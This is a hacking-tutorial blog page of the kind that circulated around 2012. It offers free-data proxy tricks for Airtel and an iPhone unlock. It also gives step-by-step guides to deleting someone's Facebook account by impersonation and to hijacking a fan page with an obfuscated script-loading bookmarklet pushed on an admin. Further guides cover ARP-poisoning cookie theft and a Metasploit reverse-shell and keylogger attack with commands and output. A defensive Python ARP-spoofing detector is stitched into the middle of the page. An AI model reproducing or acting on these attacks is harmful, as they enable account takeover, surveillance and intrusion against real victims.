Welcome to the tech blog copacopi

Showing posts with label HACKING.

Latest 2012 Airtel all india working free 2g 3g gprs trick

Hello users,
We are back with the fastest updates on the latest 3G hacks.
We have some good news for Airtel users:
Airtel has now unblocked all the restrictions on the blocked SIMs.
All the tricks are working again in the UP East and northern regions and almost all over India, including states like Haryana, Delhi, Punjab, M.P., Rajasthan, H.P., etc.
Now we can surf and download for free using the procedure below.

Notice: Most of the latest tricks get blocked soon after getting released on Crackohack!

So we have added an additional security step to protect this trick!

For mobile you have to make new settings, and for PC you have to make changes in the browser.

So here is the trick for both mobile and PC:

  • Download any of the handlers below:
    Opera Mini Next 7 Beta for Java, Symbian, Android, Blackberry
  • Now use these proxies in the mobile browser or PC browser with port 80
  • Here is the main trick: use any of the homepages given in the attachment file
  • Visit this link to download free-opening websites or realhosts: http://adf.ly/8frNR (UPDATED LINK WORKING!)
  • Using this trick you can download and watch movies online, and download games, software and much more at 3G speed!


    Boost Up Speed Of Opera Mini Internet Connection

    Hello Friends ,

    Have you ever faced a slow internet connection on your mobile?

    If yes, then we have something interesting for you.

    Most of us use the Opera Mini browser for its speed, PC-like view and compatibility, but sometimes it also gets slow due to server load, and there are errors in the web pages displayed.

    But we have a tweak for you, with which you can speed up your Opera Mini with turbo speed-up technology!

     

    • First of all, download any of the Opera Mini versions below

     

    • Then open and initialise the browser,

    • Now start browsing the web, and we bet you will feel the difference in speed and fluidity in connection speed, say thanks to turbo technology !


    Unlock AT&T iPhone 4S Without Losing Jailbreak Using SAM

    You can now unlock your AT&T iPhone 4S without having to lose your jailbreak, thanks to SAM (Subscriber Artificial Module). Right now, this is the only working method for unlocking a jailbroken iPhone 4S on AT&T, so do not bother trying it out with jailbreaking tools, such as redsn0w. SAM basically allows you to activate your iPhone using legitimate certificates generated through iTunes. Read on after the jump to understand how SAM works and how you can use it to unlock your iPhone 4S in no time!

    As explained in an earlier article on fixing iMessage/FaceTime & Push Notifications On Hacktivated iPhone 4/3GS, “iTunes activates your new iPhone using your official (supported) carrier’s IMSI, taken from the SIM card. When you hacktivate the device for use with unofficial carrier, this process is bypassed by running a daemon constantly in the background, fooling iTunes into believing that the device is already activated. While there are numerous methods and tools available for hacktivation, SAM, a free package on Cydia, spoofs a fake IMSI, making iTunes believe that the device is running on an official carrier’s SIM, thus making the program generate legitimate activation certificates.”
    Now that you understand what you’re dealing with, let’s get on with unlocking your iPhone 4S. Stating the obvious, you will need to contact AT&T and inform them of your request to unlock your device, and only then should you proceed with the instructions below to unlock your iPhone 4S.
    Disclaimer: Please attempt this guide at your own risk. AddictiveTips won’t be responsible if your device is bricked or damaged in any other way due to this method.
    Instructions:








    1. To begin, head over to the Cydia Store and add the following repo to the sources: http://repo.bingner.com  
    2. From that repo, install SAM and go back to the Settings app.
    3. Hit the Deactivate iPhone button and then connect it to iTunes.
    4. iTunes will now activate your iPhone and will unlock it in an official way.
    That’s it! You’re good to go with an unlocked iPhone 4S! Those with non jailbroken devices can simply tap reset all content and settings and continue to connect the device with iTunes to activate the phone and unlock it.

    Airtel Latest home page Hack Free Internet 2012 3G

    Hello friends,
    As we all know that fb.me is not working in some states. Now don't be worried...
    Here the Crackohack team is giving you some more IPs (use them as a home page).
    Do try them in your state, and share which one is working in your state.

    1. 63.236.44.243
    2. fb.com
    3. gclub.in
    4. airtelfb
    5. airtelworld.com
    6. 0.facebook.com
    7. 59.160.229.40


    and westbengal users good news for you....
    live.airtelworld.com back again.
    now HP=live.airtelworld.com and it will work.
    and also use
    motennis.com
    mocricket.com
    mofutbol.com
    How to Use AirTel Proxy in Handlers

    • Make AirTel your Default Internet Settings
    • Download a Handler [ Download Opera Mini Handler or Download UC Browser Handler ]
    • Open the Handler
    • Select  Proxy in Proxy Server
    • Select any of the Proxies Provided Above
    • Access free Internet
    • List of Latest Updated Handler of Opera Mini and UC Browser are below
    List Free Latest Handlers for Free internet on AirTel


    Note: Use this Trick @ low balance. below 1 Rupee
    Subscribe to us to get the updated service of AirTel proxies


    How To Delete Your Enemy's Facebook Account


    This tutorial is for educational purposes only; once deleted, a profile can never be recovered.

    Follow the steps given below:
    • Victim’s profile link ( you can get it easily )
    • His/Her Email which he/she uses to sign in
    • His/Her birth date which he/she has used in the profile
    • Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.

    • Now you will get this screen

    • Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email you created.
    • You will get an email on that ID in which facebook people will ask your problem. Reply to them that you are (put victim’s name here ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account.
    • After 2-3 days you will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
    Next Day or Same Day you will get an Email that your account is disabled. 


    Crackohack Special virus Maker 1.1 free download


     DeadLine's Virus Maker 1.1


    Hi all users, this is a cool virus maker we're posting here, brought to you exclusively by us.
    You can also check another tutorial on: How to create a Computer Virus?
    And this is what our authors say about it.

    We decided to make a custom virus maker because I don’t trust all the other virus makers that are out there on the net. I think it took me about 4 hours to code this. If you are wondering why it took me that long: it is because I used a new theme and new components, and I’m still learning how to use them properly.


    Airtel Free GPRS Trick April 2012, Airtel Free Opera Mini Trick 2012

    Hi friends, I hope you are regularly visiting our website. Along with all the working proxy tricks, one more new one is included in the latest proxy list. We have found new proxy servers for fast access.

    Here are some new proxies for the Airtel default browser, with resume downloading.
    These proxies work with both 2G and 3G networks.


    *****Latest Airtel GPRS Trick April 2012*****
    1] First Create New Settings In Your Mobile 
    APN:- airtelgprs.com
      
    Proxy Address:- 141.000.011.253
      
    Port- 80
    2] Now Open Opera Mini Handler And Use This Settings:- 
    Put Proxy Type- Http
    Put Proxy- mocricket.com or fb.me

    Just Save This Settings And Restart Mobile.
    Now Access Free GPRS On Your Mobile.
    Please Comment If You Like This Trick.  

    Airtel Free 3G Gprs With Opera & Uc RealHost Trick April 2012

    Now you can also enjoy the real host trick for Airtel free 3G internet, for unlimited downloads and surfing. It's the easiest GPRS trick for Airtel I have ever found. Just follow the procedure properly and enjoy unlimited free 3G for Airtel in April 2012.

    Trick:
    and open it. after opening in Handler menu...
     
    Just go down and in proxy type select...
    Real host
    And in proxy server enter this address...
    Fb.me
    or
    125.21.241.77/d
    or
    live.airteworld.com
     
    Now save it and let Opera initialize. Use the Mobile Office setting as default...
    Now you will see it working for free and downloading at 3G speed too.
     
    Note-use at low balance.
    Enjoy !!!

    Free latest airtel 3g gprs trick april 2012

     
    Hi friends, I hope you are regularly visiting our website. Along with all the working proxy tricks, one more new one is included in the latest proxy list. We have found new proxy servers for fast access.
     
     
    #instructions:-
     

    step1:create a new gprs/internet setting

    apn:airtelgprs.com

    proxy:lodgeus.com 

    port:80

    HP:fb.me

     
      [proxy is 100% working and testing]:)
                    enjoy :)
     

    OperaMini Free Airtel Gprs Tricks April 2012

    Hello to all friends. After my super popular trick "Optimizing Internet Connection Using Internet Cyclone - Increase Internet Speed in Windows", our team will tell you about a free GPRS trick for April 2012 on Airtel. I am giving you free Airtel GPRS tricks. How do you hack Airtel GPRS using Opera Mini? OK, let's follow a few steps to do this.


    1. First You Need Create New Setting In Your Mobile Phone

    Apn - airtelgprs.com

    Proxy Address - 141.000.011.253

    Port - 80


    2. Now You Open Operamini Handler And Use Following Given Below Settings

    Proxy Type - Http

    Proxy - mocricket.com Or fb.me

    That's it Now You Are Done .

    This trick is already tested and working fine in Rajasthan. Please check in your state also.

    Download News Hunt hacked handler mod for Airtel 2012 March-April Trick .jar [Latest Trick]




    After Uc Browser Moded for Airtel, We are here with  News Hunt ReModed and hacked For Airtel. This software is designed to enable reading all Indian Newspapers with latest news in the different regional languages.
    News Hunt supports reading newspapers in many regional languages and also in English. The languages supported currently are Hindi, Bengali, Punjabi, Gujarati, Marathi, Kannada,

    Download Latest Uc Browser 8.2.0.132 hacked handler mod for Airtel 2012 March Trick.jar [ updated ]



    Our previous post was about Google Translate Java hacked for Airtel. We hope all of you liked it. Through e-mails and comments, many people said that they want a UC Browser hacked for Airtel.
    Recently the UC Mobile team released a new version of UC Browser, UC Browser 8.2.0.132. We have remodded the UC Browser Handler Mod with free Airtel GPRS. This trick is tested in Kerala and it was

    How to Hack Facebook Fan Page (EXCLUSIVE AT CRACKOHACK)

    Hello guys! After receiving a good response from you, I am posting a new trick here at crackohack.in. It will tell you about a new hacking technique and will also increase your knowledge so that you do not become a victim of such hacks. But always remember:


    Note: Never use these tricks to harm any innocent, Just increase your knowledge and we will not be responsible for any harm caused.

    The purpose of this trick and hack is to attack a fan page by fooling the admin by social engineering, I saw some people becoming victim of this, So i decided to teach about this hack to my loyal readers. Don't forget to share this with friends.

    Things we shall need:
    1. Facebook page hacking exploit.
    2. A free hosting.
    3. A key or script to run that "Facebook page hacking exploit.".
    4. Your facebook email id.
    5. Brain ( A bit ;) )

    I will try to be simple, but if you don't get anything then kindly ask at comment below.

    1. Facebook page hacking exploit:
    Download this exploit from the link below, Complete the survey and you will get this exploit for free.
                                               Download script from here                                   

    Now, After downloading it you will get key inside it also, and also the exploit, First we have to edit it,

    a) Editing the exploit:
    First of all see you facebook email id which you used to signup at facebook, see pic below thats the pic of exploit:

    Now change the highlighted id to your's facebook id, Above its, bhupinder9dec@gmail.com
    2. Get free hosting:Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net.


    Upload the exploit and i recommend change its name from pagehack.js to fanbooster.js or something more attracting.

    3. Using the exploit by Key or script:
    Use this script to complete this attack. Now the main thing is social engineering,  its up to you that how you give him this script or key, Well Change the following part in the key to your own script path:

    javascript:(a = (b = document).createElement("script")).src = "//http://dl.dropbox.com/u/67513625/fanbooster.js", b.body.appendChild(a); void(0)
    Change this to your hosting , and also change the exploite name in this key if you have changed it while uploading as suggesting.

    Tip: Encode this in ASCII format, Victim might not know what is this.
    Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

    Tip: Tell him that it will make your page safe, or something else like attracting

    When he will put this key in address bar and thats it you will get a notification that you are admin of his page now.

    Enjoy cracking and hacking, But don't hack for bad cause, We  will not be responsible

    How to hack Facebook via Sniffing ?


    Hi all users, after receiving your mails saying that most Facebook hacks don't work anymore, we searched, tested and posted some of the most popular Facebook hacking techniques, but I think they still don't work for you. So finally we've found this technique, working 100% for hacking Facebook, and today we're here to let you know how to do it. So you want to hack Facebook, eh? Before we begin learning how to sniff and start ARP poisoning, let's first begin with this: this tutorial was designed for educational purposes only! I take no responsibility for whatever damage this may cause to those who wish to participate in this act of hacking! That being said, if you still wish to continue in learning how to get into someone's Facebook without them knowing, proceed along.

    There are a couple of terms you will have to know before we begin. This is so that you don't find yourself scratching your head midway through this post wondering what the @$%# I'm talking about. Please understand the following terms and their respective definitions before proceeding.


    • Cookie:  A cookie is just one or more pieces of information stored as text strings on your machine. A Web server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies are essentially utilized so that the website can remember certain aspects of that particular website so that when you return it loads the page faster.
    • ARP Spoofing/Poisoning:  ARP stands for Address Resolution Protocol and is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. It's the "guy" behind the scenes that stands in the middle of all the network traffic, takes in the requests of other computers on the LAN, and returns valuable information/answers. How do you think you get your IP address when you look up ipconfig in CMD? Your computer sends out a request to extract its IP address and the ARP essentially gives you the IP address for your computer. The act of "spoofing" or "poisoning" the ARP, as you probably can already tell, is a very dangerous protocol. By doing so, you are enacting what's called a "man-in-the-middle-attack", MITM for short. When you poison the ARP of a computer within a LAN, you are making yourself the ARP. In other words, all the requests the computers in the network make come directly to you and the answers go directly from you. More on this later.
    • Packet(s): Packet, or packets, are a formatted unit of data carried by a packet mode computer network. They contain literally a million variety of information and provide useful methods in transmitting/receiving requested information. For example, let's take a look at sending an email. On the Internet, the network breaks an e-mail message into parts of a certain size in bytes. These are the packets. Each packet carries the information that will help it get to its destination -- the sender's IP address, the intended receiver's IP address, something that tells the network how many packets this e-mail message has been broken into and the number of this particular packet. The packets carry the data in the protocols that the Internet uses: Transmission Control Protocol/Internet Protocol (TCP/IP). Each packet contains part of the body of your message. Hopefully this gives you a general idea of how packets work and what they provide for both your computer and the internet.
    • Sniffing: Sniffing usually refers to sniffing network packets. Packet sniffing is the act of eavesdropping on another computer's packet transfer and capturing (saving) those packet transfers for analysis. Though this sounds malicious and wrong, packet sniffing is used widely around the world today for a number of beneficial reasons. But yes, you are correct, just like everything else there are both good and bad intentions for sniffing. An analysis of "sniffed" packets can often be used to pick out abusive/malicious acts within a network. An analysis can also allow the "sniffer" to pick out what the slave has been doing and what kind of information the slave's computer has been sending/receiving. Again, just a general definition but you get the picture.
    Please read through the definitions and familiarize yourself with the terms before asking what certain things mean here. You can't expect to know anything and everything without doing some homework. Trust me, knowing these terms will not only save you time but also give you the benefit of becoming more knowledgeable about basic network definitions.

    Software

    The following is a comprehensive list of the software you will be needing for this practice. I've given the links to their home pages where you can download the software for free.


    Sniffing Your Way In

    Now that you're generally familiar with some basic network definitions and have downloaded the required tools to effectively sniff packets, let us begin. Go ahead and open up Firefox and log into your Facebook account. You should be able to see the "cookies" option in the upper-left corner of the toolbar. Click on that and select "View Cookie Information".

    You should now see a collective group of information all in regards to the cookies saved on your computer for Facebook. The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie (which contains important information for the specified c_user). Our goal in sniffing into someone else's Facebook is to trick the browser and the computer into thinking that we are someone else. How do we do this? By manipulating cookies to disguise ourselves. Essentially we are swapping our actual Facebook cookies to that of the slave's so that when we log back into Facebook, it will think we are the slave rather than ourselves. Not too hard to understand, right?

    Go ahead and close out of Firefox for now. Next, go and install Cain and Abel. Throughout the installation process, the setup wizard will ask if you want to install the packet driver WinPCap--go ahead and install this. Once you have successfully installed Cain and Abel, open the program. Now follow these steps exactly:
    • Click on configure on top and select your Network card. Mostly it's the one with an IP address.
    • Next click on the start/stop sniffer on top as shown below in green square.
    • Once you start the sniffer, goto the sniffer tab in Cain, right-click and click scan MAC address as shown below!


    Depending on your computer and your network population this process can take a couple of minutes. Once it's complete, however, you should be able to pull up a list of computers on your LAN. One cool thing you can do here is right-click one of the computers and find out the computer name. Now it's time for the attack! What was the name of the attack again? Anyone? Did you forget already? Ah, yes, the MITM attack!

    Again, follow these steps accurately to effectively spoof the ARP :

    • First Click the APR tab below in cain.
    • Click the white screen in the top frame
    • Click the blue plus on top.


    You should get a list of all the devices on the left and a blank screen on the right. In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe it's better to target one computer. But if you want some real fun then select all the computers on the right frame. Press "Ok". A caveat in selecting a large amount of computers, however, is that your computer may not be able to handle all the network transmissions and therefore lose some packet captures. Also keep in mind, however, that if someone is working in the router or is monitoring/analyzing the router and actually knows what he/she is doing, they could immediately detect that you are ARP poisoning the router. So be careful! You can get caught.

    All the computers should have populated the top-frame. Now select the whole list and click on the nuclear button (top left of Cain, bolded box in the picture below).
    And you're done! You've successfully poisoned the ARP of the computers you've selected and you are now the "middle-man" between your slave's computer and the router to the internet. But wait just a second--we can't get into the slave's Facebook just yet! All we've done so far is established ourselves to be the "middle-man". We have to now capture some packets, swap cookies, and voila! We're in.

    Now we will open up Wireshark. Follow the steps below :

    • Open up wireshark
    • Go to "Capture –> Interfaces" in the top menu and select your interface. It’s usually the one which has an IP address and a certain number of packets flowing through it.
    • Next go to "Capture" and click on "Start".  
    It should look something like this.
    This window has all the packets sent from the slave’s/victims’ computer to the router and all the packets sent from the router to the slave.

    Next in the filter type “http.cookie contains datr”. You ask why? Because, when a user logs in to Facebook, he is given some cookies which are unique to him. If we replace our cookies with the slave’s cookies, we can log in to his account, as then Facebook won't know the difference.

     
    After filtering the cookies out, right-click on any one of them and click on "Follow TCP Stream".


    In the TCP stream look for the line "Cookie: ( and all cookie names)". If it doesn't show up, select some other packet in Wireshark and click on "Follow TCP Stream" for that particular cookie. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

     
    You now have the slave's cookies for his/her Facebook. The main ones we need to focus on are the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. Now open up Firefox and go to Facebook. If you're logged in, log out so that you're at Facebook's home page. Click on the "Cookie" option in the toolbar (as like before) and do the following in this exact order. 
    • Clear session cookies.
    • Delete domain cookies.
    • Delete path cookies.
    Note :-
    If you don't do the steps in that same order, this will not work!

    Note :- Once you do this, reload the Facebook page (http://www.facebook.com). This is to ensure that you are loading the Facebook page clean without any pre-existing cookies.

    Now login to your account with your username and password. After logging in, click on cookies in web developer add-on just like before and click on “View Cookie Information”. You should see all of your Facebook cookies now. Any ideas what we do next? I suspect you know by now.

    Click on “Edit Cookie” for each cookies there and replace the cookie value with the value you got through Wireshark. If you didn't get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.
    After you have swapped cookies, go ahead and refresh the page. Voila! You should now be logged in as your slave rather than yourself. Congratulations, you have successfully "hacked" your way into someone else's Facebook! Again, please keep in mind that this only works for computers within your LAN. So if you're at home, you can only get into the Facebook of people who are connected at home. No, you cannot hack into the Facebook of someone across the world.

    I hope you guys have enjoyed this tutorial! Please feel free to leave me any questions below or PM me with any issues you have. I'll try to respond and reply at my soonest convenience.
    If you liked this tutorial then +1 us on google+ and like our facebook fan page to get latest updates like this!
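
The tutorial itself notes that anyone monitoring the router can spot the ARP poisoning. The following added example (not part of the original post) shows one way a defender can do that from observed ARP replies: it flags an IP address whose MAC changes and a single MAC that claims several IPs. The `ArpObservation` type, the function name and the sample addresses are constructed for illustration, and the first MAC seen for an IP is assumed to be the legitimate one.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpObservation:
    """One ARP reply seen on the LAN (hypothetical record type for this example)."""
    ts: float   # seconds since monitoring started
    ip: str     # sender IP address claimed in the reply
    mac: str    # sender MAC address claimed in the reply


def detect_arp_poisoning(observations, gateway_ip):
    """Return findings as (kind, subject, detail) tuples, in the order detected.

    kind is one of:
      "gateway-rebind": the gateway IP is now claimed by a different MAC
      "ip-rebind":      any other IP is now claimed by a different MAC
      "multi-ip-mac":   one MAC has claimed more than one IP address
    """
    baseline = {}                   # ip -> first MAC seen (assumed legitimate)
    ips_by_mac = defaultdict(set)   # mac -> every IP it has claimed
    reported = set()                # (ip, mac) pairs already flagged
    findings = []

    for obs in sorted(observations, key=lambda o: o.ts):
        mac = obs.mac.lower()       # normalise case before comparing
        known = baseline.setdefault(obs.ip, mac)
        if mac != known and (obs.ip, mac) not in reported:
            reported.add((obs.ip, mac))
            kind = "gateway-rebind" if obs.ip == gateway_ip else "ip-rebind"
            findings.append((kind, obs.ip, f"{known} -> {mac}"))
        ips_by_mac[mac].add(obs.ip)

    # A poisoner answering for the router and for other hosts shows up as one
    # MAC behind several IPs. Multi-homed hosts and proxy ARP also do this, and
    # DHCP lease reuse can cause a legitimate rebind, so treat every finding as
    # a lead to investigate rather than proof.
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("multi-ip-mac", mac, ", ".join(sorted(ips))))
    return findings


# Constructed sample: a router and two hosts, then the host at .30 starts
# answering for the router and for the host at .20.
GATEWAY = "192.168.1.1"
SAMPLE = [
    ArpObservation(0.0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    ArpObservation(1.0, "192.168.1.20", "bb:bb:bb:bb:bb:20"),
    ArpObservation(2.0, "192.168.1.30", "cc:cc:cc:cc:cc:30"),
    ArpObservation(10.0, "192.168.1.1", "cc:cc:cc:cc:cc:30"),
    ArpObservation(10.5, "192.168.1.20", "cc:cc:cc:cc:cc:30"),
    ArpObservation(12.0, "192.168.1.1", "CC:CC:CC:CC:CC:30"),  # repeat, upper case
]

# Constructed sample with no anomalies, for comparison.
CLEAN = SAMPLE[:3]

if __name__ == "__main__":
    for kind, subject, detail in detect_arp_poisoning(SAMPLE, GATEWAY):
        print(f"{kind:15} {subject:18} {detail}")
```
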

    Metasploit Tutorial - With an example | Exploiting the vulnerabilities

    --- The Metasploit Framework ---


    Note: This is an advanced topic. Read carefully. Feel free to ask any kind of queries. We are always here to help you.

    If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
    Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
    Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
    The topic of Metasploit is very vast in itself. However, I'll try keeping it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack).
    In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

    Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

    Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them).

    Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
    Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
    Overflow: Error caused when a program tries to store data beyond its size. May be used by an attacker to execute malicious code.
    Payload: Actual code which runs on the compromised system after exploitation
    Now, what Metasploit IS?
    It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



    METASPLOIT ANTI FORENSICS:
    Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer a little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
    Metasploit comes in the following versions:
    1. CLI (Command Line Interface)
    2. Web Interface
    3. MSF Console
    4. MSFwx
    5. MSFAPI
    I would recommend using the MSF Console because of its effectiveness and power from a pentester’s P0V. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
    I would recommend doing the following things in Metasploit on Backtrack (system or image), avoiding the Windows version of the tool.
    For those who don't know, Backtrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.
    Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have access to more than one system physically, then go for the ISO image and install it on your hard disk.
    Let the Hacking Begin :
    Open up backtrack. You should have a screen similar to this.

    The default login credentials are:
    Username: root
    Pass: toor
    Type in
    root@bt:~#/etc/init.d/wicd start
    to start the wicd manager
    Finally, type "startx" to start the GUI mode:
    root@bt:~#startx

    First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
    root@bt:~#ifconfig
    It would be something like 192.168.x.x or 10.x.x.x.
    Have a note of it.
    Now,
    Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

    You should now be having a shell something similar to a command prompt in windows.
    msf >
    Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
    Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

    root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
    Your local IP is the one you noted earlier and for port you could select 4444.
    (Everything has to be entered without quotes)
    You should get something like this:
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options: LHOST=192.168.255.130,LPORT=4444
    root@bt:/opt/metasploit3/msf3#
    Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

    Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


    Now open the 1st shell window with msfconsole in it.
    msf >
    Type the following:
    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST 192.168.255.130
    LHOST => 192.168.255.130
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444

    All the connections are done. You have already made an executable file which makes a reverse connection to you.
    And now, you have set the meterpreter to listen to you on port 4444.
    The last step you have to do now, is to type in “exploit” and press enter,
    msf exploit(handler) > exploit

    [*] Started reverse handler on 192.168.255.130:4444
    [*] Starting the payload handler...
    Now, the payload is listening for all the incoming connections on port 4444.
    [*] Sending stage (749056 bytes) to 192.168.255.1
    [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

    You would see a meterpreter prompt like this
    meterpreter >
    Type in ps to list the active processes
    meterpreter > ps

    Search for explorer.exe and migrate to the process
    meterpreter > migrate 5716
    [*] Migrating to 5716...
    [*] Migration completed successfully.
    meterpreter >

    Type in the following:
    meterpreter > use priv
    Now, if you want to start the Keylogger activity on victim, just type keyscan_start

    Now, if you want to go to the victim’s computer,
    Just type shell
    meterpreter > shell
    Process 5428 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.
    C:\Windows\system32>

    You would now be having a command prompt,
    Type in whoami, to see the computer’s name of victim :
    C:\Windows\system32>whoami
    whoami
    win7-pc\win 7
    C:\Windows\system32>

    Let’s suppose you want to start a notepad on the victim’s computer.
    Type in:
    Let’s say the victim has typed in anything on his computer.
    Just type exit, to return to meterpreter.
    Now type in keyscan_dump, to see all the typed keystrokes :
    meterpreter > keyscan_dump
    Dumping captured keystrokes...

    GaM3 0V3R
    P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

    © Copacopi, AllRightsReserved.